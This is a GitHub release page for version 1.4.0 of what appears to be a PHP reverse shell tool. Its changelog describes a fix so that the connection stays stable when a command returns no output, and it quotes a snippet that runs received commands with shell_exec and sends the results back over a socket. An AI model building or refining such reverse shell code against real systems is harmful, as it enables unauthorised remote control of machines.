Skip to content

v1.4.0

Latest

Choose a tag to compare

@4m3rr0r 4m3rr0r released this 14 Jan 15:16
· 4 commits to main since this release
c4c5fe5

Fix: Handle null or empty command output in reverse shell connection

In this update, the reverse shell connection was enhanced to handle cases where the shell command produces null or empty output. Previously, this could have led to connection instability or crashes. The following changes were made:

  • Null or Empty Output Handling: If the shell command does not return any output, a fallback message is now sent to the socket, preventing any connection issues.
    $output = shell_exec($cmd);
    fwrite($sock, $output ?: 'No output from command.');